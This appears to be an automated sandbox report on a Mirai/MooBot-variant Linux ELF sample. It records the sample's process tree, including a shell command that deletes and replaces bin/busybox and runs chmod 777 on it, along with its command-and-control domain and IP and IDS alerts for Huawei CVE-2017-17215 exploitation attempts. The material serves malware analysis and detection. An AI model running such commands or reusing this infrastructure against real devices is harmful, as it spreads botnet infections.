            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/251/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/252/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/132/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/253/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/254/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/255/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/256/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1599/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/257/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1477/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/379/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/258/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1476/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/259/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1475/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/4501/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/936/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/30/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2208/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/35/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1809/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1494/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/260/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6232)Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox\\xff\\xec0\\x80 && mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80; chmod 777 \\xff\\xecHbin/busybox"
            Source: /bin/sh (PID: 6234)Rm executable: /usr/bin/rm -> rm -rf bin/busybox
            Source: submitted sampleStderr: mv: cannot stat '/tmp/sduVQWDj8L.elf'$'\377\377\377\377\377\377\354''H': No such file or directorychmod: cannot access ''$'\377\354''Hbin/busybox': No such file or directory: exit code = 0

            Hooking and other Techniques for Hiding and Protection

            Source: unknownNetwork traffic detected: HTTP traffic on port 58510 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58510
            Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33446 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33446
            Source: /tmp/sduVQWDj8L.elf (PID: 6230)Queries kernel information via 'uname':
            Source: sduVQWDj8L.elf, 6230.1.00005586b17a3000.00005586b1807000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/m68k
            Source: sduVQWDj8L.elf, 6230.1.00007ffc6ef06000.00007ffc6ef27000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
            Source: sduVQWDj8L.elf, 6230.1.00005586b17a3000.00005586b1807000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
            Source: sduVQWDj8L.elf, 6230.1.00007ffc6ef06000.00007ffc6ef27000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/sduVQWDj8L.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sduVQWDj8L.elf

            Stealing of Sensitive Information

            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTR
            MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the count of matched signatures shown for that technique)

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
            Execution: Scripting (1); Scheduled Task/Job; At (Linux); At (Windows)
            Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
            Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
            Defense Evasion: File and Directory Permissions Modification (1); Scripting (1); File Deletion (1); Binary Padding
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS
            Discovery: Security Software Discovery (11); Application Window Discovery; Query Registry; System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
            Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
            Command and Control: Encrypted Channel (1); Non-Standard Port (11); Non-Application Layer Protocol (2); Application Layer Protocol (3)
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
            Impact: Modify System Partition; Device Lockout; Delete Device Data
            No configs have been found
            Behavior Graph (ID: 830728)
            Sample: sduVQWDj8L.elf, Start date: 20/03/2023, Architecture: LINUX, Score: 92
            Network nodes: kamuiv3.hopto.org; 197.191.9.206 port 37215 (zain-asGH, Ghana); 99 other IPs or domains
            Signatures attached to the root process: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
            Process tree (all processes shown as started):
              sduVQWDj8L.elf
                sh
                  chmod  (signature: Sets full permissions to files and/or directories)
                  rm
                  mkdir
                  mv
                sduVQWDj8L.elf
                  sduVQWDj8L.elf
                  sduVQWDj8L.elf
            Source | Detection | Scanner | Label | Link
            sduVQWDj8L.elf | 49% | ReversingLabs | Linux.Trojan.Mirai |
            sduVQWDj8L.elf | 56% | Virustotal | | Browse
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            kamuiv3.hopto.org | 1% | Virustotal | | Browse
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            kamuiv3.hopto.org | 103.161.181.97 | true | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://schemas.xmlsoap.org/soap/encoding/ | sduVQWDj8L.elf | false | | high
            http://schemas.xmlsoap.org/soap/envelope/ | sduVQWDj8L.elf | false | | high
                IP | Domain | Country | ASN | ASN Name | Malicious
                197.1.57.226 | unknown | Tunisia | 37705 | TOPNETTN | false
                197.223.50.29 | unknown | Egypt | 37069 | MOBINILEG | false
                157.62.68.49 | unknown | United States | 22192 | SSHENETUS | false
                41.198.167.191 | unknown | South Africa | 327693 | ECHO-SPZA | false
                157.196.171.9 | unknown | United States | 4704 | SANNETRakutenMobileIncJP | false
                41.160.135.186 | unknown | South Africa | 36937 | Neotel-ASZA | false
                157.78.121.32 | unknown | Japan | 4725 | ODNSoftBankMobileCorpJP | false
                157.65.110.239 | unknown | Japan | 2514 | INFOSPHERENTTPCCommunicationsIncJP | false
                41.85.100.25 | unknown | South Africa | 328418 | Olena-Trading-ASZA | false
                197.149.99.193 | unknown | Nigeria | 35074 | COBRANET-ASLB | false
                41.85.32.189 | unknown | South Africa | 22355 | FROGFOOTZA | false
                157.123.84.139 | unknown | United States | 17623 | CNCGROUP-SZChinaUnicomShenzennetworkCN | false
                41.245.242.131 | unknown | Nigeria | 328050 | Intercellular-Nigeria-ASNG | false
                76.99.121.19 | unknown | United States | 7922 | COMCAST-7922US | false
                220.50.198.219 | unknown | Japan | 17676 | GIGAINFRASoftbankBBCorpJP | false
                60.174.126.96 | unknown | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | false
                197.47.50.232 | unknown | Egypt | 8452 | TE-ASTE-ASEG | false
                197.114.33.146 | unknown | Algeria | 36947 | ALGTEL-ASDZ | false
                60.66.153.73 | unknown | Japan | 17676 | GIGAINFRASoftbankBBCorpJP | false
                197.143.47.123 | unknown | Algeria | 36891 | ICOSNET-ASDZ | false
                41.71.234.18 | unknown | Nigeria | 37053 | RSAWEB-ASZA | false
                197.240.178.152 | unknown | unknown | 37705 | TOPNETTN | false
                8.99.178.50 | unknown | United States | 3356 | LEVEL3US | false
                140.90.136.173 | unknown | United States | 6629 | NOAA-ASUS | false
                157.79.18.140 | unknown | Japan | 2514 | INFOSPHERENTTPCCommunicationsIncJP | false
                41.81.68.209 | unknown | Kenya | 33771 | SAFARICOM-LIMITEDKE | false
                197.85.129.148 | unknown | South Africa | 10474 | OPTINETZA | false
                157.22.239.131 | unknown | United States | 7091 | VIANET-ASNUS | false
                41.210.203.164 | unknown | Angola | 37081 | movicel-asAO | false
                41.79.17.121 | unknown | South Africa | 37317 | AccessGlobal-ASZA | false
                189.91.115.118 | unknown | Brazil | 262589 | INTERNEXABRASILOPERADORADETELECOMUNICACOESSABR | false
                157.13.147.166 | unknown | Japan | 2907 | SINET-ASResearchOrganizationofInformationandSystemsN | false
                41.179.121.15 | unknown | Egypt | 24863 | LINKdotNET-ASEG | false
                41.133.51.51 | unknown | South Africa | 10474 | OPTINETZA | false
                197.173.179.158 | unknown | South Africa | 37168 | CELL-CZA | false
                189.212.136.49 | unknown | Mexico | 6503 | AxtelSABdeCVMX | false
                197.91.153.1 | unknown | South Africa | 10474 | OPTINETZA | false
                60.149.106.117 | unknown | Japan | 17676 | GIGAINFRASoftbankBBCorpJP | false
                197.111.127.234 | unknown | South Africa | 37168 | CELL-CZA | false
                41.152.192.53 | unknown | Egypt | 36992 | ETISALAT-MISREG | false
                41.133.38.88 | unknown | South Africa | 10474 | OPTINETZA | false
                197.87.33.160 | unknown | South Africa | 10474 | OPTINETZA | false
                173.87.1.242 | unknown | United States | 5650 | FRONTIER-FRTRUS | false
                135.244.77.53 | unknown | United States | 10455 | LUCENT-CIOUS | false
                197.151.240.167
                unknownEgypt
                37069MOBINILEGfalse
                157.190.98.73
                unknownIreland
                1213HEANETIEfalse
                196.102.195.33
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                41.87.73.250
                unknownNigeria
                37248PHASE3TELNGfalse
                157.126.150.134
                unknownUnited States
                1738OKOBANK-ASEUfalse
                41.240.157.149
                unknownSudan
                36998SDN-MOBITELSDfalse
                197.199.7.181
                unknownEgypt
                36992ETISALAT-MISREGfalse
                186.179.177.66
                unknownSuriname
                27775TelecommunicationcompanySuriname-TeleSurSRfalse
                197.10.137.41
                unknownTunisia
                5438ATI-TNfalse
                68.87.125.1
                unknownUnited States
                7922COMCAST-7922USfalse
                41.138.165.98
                unknownNigeria
                20598CYBERSPACE-ASAutonomousSystemnumberforCyberSpaceILfalse
                197.220.166.155
                unknownGhana
                37341GLOMOBILEGHfalse
                41.2.68.161
                unknownSouth Africa
                29975VODACOM-ZAfalse
                157.35.127.107
                unknownIndia
                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                157.159.2.41
                unknownFrance
                2094FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudParifalse
                8.158.86.57
                unknownSingapore
                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                157.132.47.117
                unknownUnited States
                7872USAP-ASNUSfalse
                197.223.37.83
                unknownEgypt
                37069MOBINILEGfalse
                197.254.179.183
                unknownLesotho
                37057VODACOM-LESOTHOLSfalse
                157.87.159.77
                unknownUnited States
                21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                197.126.108.8
                unknownEgypt
                36992ETISALAT-MISREGfalse
                197.210.224.167
                unknownNigeria
                29465VCG-ASNGfalse
                41.252.35.38
                unknownLibyan Arab Jamahiriya
                21003GPTC-ASLYfalse
                41.249.173.106
                unknownMorocco
                36903MT-MPLSMAfalse
                157.207.174.6
                unknownUnited States
                53926APA-US-ASNUSfalse
                197.162.72.182
                unknownEgypt
                24863LINKdotNET-ASEGfalse
                197.53.179.35
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                157.98.43.113
                unknownUnited States
                3527NIH-NETUSfalse
                157.8.148.250
                unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                41.145.34.34
                unknownSouth Africa
                5713SAIX-NETZAfalse
                157.208.202.62
                unknownUnited States
                12552IPO-EUSEfalse
                41.219.166.64
                unknownNigeria
                37196SUDATEL-SENEGALSNfalse
                64.130.175.217
                unknownUnited States
                29894SCRTCUSfalse
                197.99.108.8
                unknownSouth Africa
                3741ISZAfalse
                157.111.53.185
                unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                197.105.252.103
                unknownSouth Africa
                37168CELL-CZAfalse
                198.245.126.231
                unknownCanada
                803SASKTELCAfalse
                157.21.249.79
                unknownUnited States
                53446EVMSUSfalse
                138.109.66.95
                unknownUnited States
                396290NIELSEN-COMPANYUSfalse
                41.37.96.7
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                197.232.116.197
                unknownKenya
                36866JTLKEfalse
                41.195.79.205
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                157.55.204.10
                unknownUnited States
                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                157.111.84.4
                unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                157.161.177.122
                unknownSwitzerland
                6772IMPNET-ASCHfalse
                41.80.151.200
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                17.106.158.120
                unknownUnited States
                714APPLE-ENGINEERINGUSfalse
                157.193.175.224
                unknownBelgium
                2611BELNETBEfalse
                41.79.184.220
                unknownTanzania United Republic of
                30844LIQUID-ASGBfalse
                83.0.173.193
                unknownPoland
                5617TPNETPLfalse
                41.134.200.146
                unknownSouth Africa
                10474OPTINETZAfalse
                197.191.9.206
                unknownGhana
                37140zain-asGHfalse
                197.213.1.132
                unknownZambia
                37287ZAIN-ZAMBIAZMfalse
                41.136.251.140
                unknownMauritius
                23889MauritiusTelecomMUfalse
                197.108.90.244
                unknownSouth Africa
                37168CELL-CZAfalse
                68.206.197.161
                unknownUnited States
                11427TWC-11427-TEXASUSfalse
                No context
                No context
                No context
                No context
                No context
                No created / dropped files found
                File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                Entropy (8bit): 6.274480834720636
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name: sduVQWDj8L.elf
                File size: 71804
                MD5: 73f351e58cf41fb59c37b4196103c026
                SHA1: 9337226b4d4876a4cb7eb287678360db263a6ef2
                SHA256: 04d57a6c870dec6d92d266d55ca978ab2f69a257e6f8d30e024af364e01ab166
                SHA512: 5ea3bc3dc3c022cb0b63367bededc49212077d839ae591f1aa9a95f7268951659f88316a858cedbbb614b1d8399cf63c5dc096c08eabdb1383aa2f6af0ec1a0b
                SSDEEP: 1536:fWo3SUqGhiD4DXW80fHL1gxBVvxdJLL011iu7QVc:fWoiUxiEDXiL1aBRx/Lu78c
                TLSH: 17634C9AF801DD7DF84BD77F0453090AB930A3D153831B3A6797BDA3BC721992922E85
                File Content Preview: .ELF.......................D...4.........4. ...(.......................>...>...... ........D..3D..3D...h..%h...... .dt.Q............................NV..a....da.....N^NuNV..J9..6.f>"y..3\ QJ.g.X.#...3\N."y..3\ QJ.f.A.....J.g.Hy...@N.X.......6.N^NuNV..N^NuN

                ELF header

                Class:
                Data:
                Version:
                Machine:
                Version Number:
                Type:
                OS/ABI:
                ABI Version:
                Entry Point Address:
                Flags:
                ELF Header Size:
                Program Header Offset:
                Program Header Size:
                Number of Program Headers:
                Section Header Offset:
                Section Header Size:
                Number of Section Headers:
                Header String Table Index:
                Section headers

                Name       Type      Address     Offset   Size    EntSize  Flags  Flags Description  Link  Info  Align
                           NULL      0x0         0x0      0x0     0x0      0x0                       0     0     0
                .init      PROGBITS  0x80000094  0x94     0x14    0x0      0x6    AX                 0     0     2
                .text      PROGBITS  0x800000a8  0xa8     0xf50a  0x0      0x6    AX                 0     0     4
                .fini      PROGBITS  0x8000f5b2  0xf5b2   0xe     0x0      0x6    AX                 0     0     2
                .rodata    PROGBITS  0x8000f5c0  0xf5c0   0x1d7e  0x0      0x2    A                  0     0     2
                .ctors     PROGBITS  0x80013344  0x11344  0x8     0x0      0x3    WA                 0     0     4
                .dtors     PROGBITS  0x8001334c  0x1134c  0x8     0x0      0x3    WA                 0     0     4
                .data      PROGBITS  0x80013358  0x11358  0x354   0x0      0x3    WA                 0     0     4
                .bss       NOBITS    0x800136ac  0x116ac  0x2200  0x0      0x3    WA                 0     0     4
                .shstrtab  STRTAB    0x0         0x116ac  0x3e    0x0      0x0                       0     0     1
                Program headers

                Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align   Prog Interpreter  Section Mappings
                LOAD       0x0      0x80000000       0x80000000        0x1133e    0x1133e      6.3097   0x5    R E                0x2000                    .init .text .fini .rodata
                LOAD       0x11344  0x80013344       0x80013344        0x368      0x2568       2.8638   0x6    RW                 0x2000                    .ctors .dtors .data .bss
                GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x4
                Snort IDS alerts

                Timestamp                 Protocol  SID      Message                                                                      Source Port  Dest Port  Source IP       Dest IP
                03/20/23-16:42:31.188141  TCP       2835222  ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)     33446        37215      192.168.2.23    41.46.204.168
                03/20/23-16:40:34.606175  TCP       2030490  ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)  51628        56999      192.168.2.23    103.161.181.97
                03/20/23-16:41:11.152192  TCP       2835222  ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)     58510        37215      192.168.2.23    41.232.131.216
                03/20/23-16:41:36.868569  TCP       2835222  ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)     49218        37215      192.168.2.23    197.214.97.175
                03/20/23-16:42:32.484003  TCP       2030489  ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response                      56999        51628      103.161.181.97  192.168.2.23
                DNS queries

                Timestamp                          Source IP     Dest IP  Trans ID  OP Code             Name               Type            Class        DNS over HTTPS
                Mar 20, 2023 16:40:34.407533884 CET  192.168.2.23  8.8.8.8  0x6cab    Standard query (0)  kamuiv3.hopto.org  A (IP address)  IN (0x0001)  false

                DNS answers

                Timestamp                          Source IP  Dest IP       Trans ID  Reply Code    Name               CName  Address         Type            Class        DNS over HTTPS
                Mar 20, 2023 16:40:34.429055929 CET  8.8.8.8    192.168.2.23  0x6cab    No error (0)  kamuiv3.hopto.org         103.161.181.97  A (IP address)  IN (0x0001)  false

                System Behavior

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /tmp/sduVQWDj8L.elf
                Arguments: /tmp/sduVQWDj8L.elf
                File size: 4463432 bytes
                MD5 hash: cd177594338c77b895ae27c33f8f86cc

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /tmp/sduVQWDj8L.elf
                Arguments: n/a
                File size: 4463432 bytes
                MD5 hash: cd177594338c77b895ae27c33f8f86cc

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /bin/sh
                Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox\\xff\\xec0\\x80 && mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80; chmod 777 \\xff\\xecHbin/busybox"
                File size: 129816 bytes
                MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /bin/sh
                Arguments: n/a
                File size: 129816 bytes
                MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /usr/bin/rm
                Arguments: rm -rf bin/busybox
                File size: 72056 bytes
                MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /bin/sh
                Arguments: n/a
                File size: 129816 bytes
                MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /usr/bin/mkdir
                Arguments: mkdir bin
                File size: 88408 bytes
                MD5 hash: 088c9d1df5a28ed16c726eca15964cb7

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /bin/sh
                Arguments: n/a
                File size: 129816 bytes
                MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /usr/bin/mv
                Arguments: mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80
                File size: 149888 bytes
                MD5 hash: 504f0590fa482d4da070a702260e3716

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /bin/sh
                Arguments: n/a
                File size: 129816 bytes
                MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /usr/bin/chmod
                Arguments: chmod 777 \\xff\\xecHbin/busybox
                File size: 63864 bytes
                MD5 hash: 739483b900c045ae1374d6f53a86a279

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /tmp/sduVQWDj8L.elf
                Arguments: n/a
                File size: 4463432 bytes
                MD5 hash: cd177594338c77b895ae27c33f8f86cc

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /tmp/sduVQWDj8L.elf
                Arguments: n/a
                File size: 4463432 bytes
                MD5 hash: cd177594338c77b895ae27c33f8f86cc

                Start time: 16:40:33
                Start date: 20/03/2023
                Path: /tmp/sduVQWDj8L.elf
                Arguments: n/a
                File size: 4463432 bytes
                MD5 hash: cd177594338c77b895ae27c33f8f86cc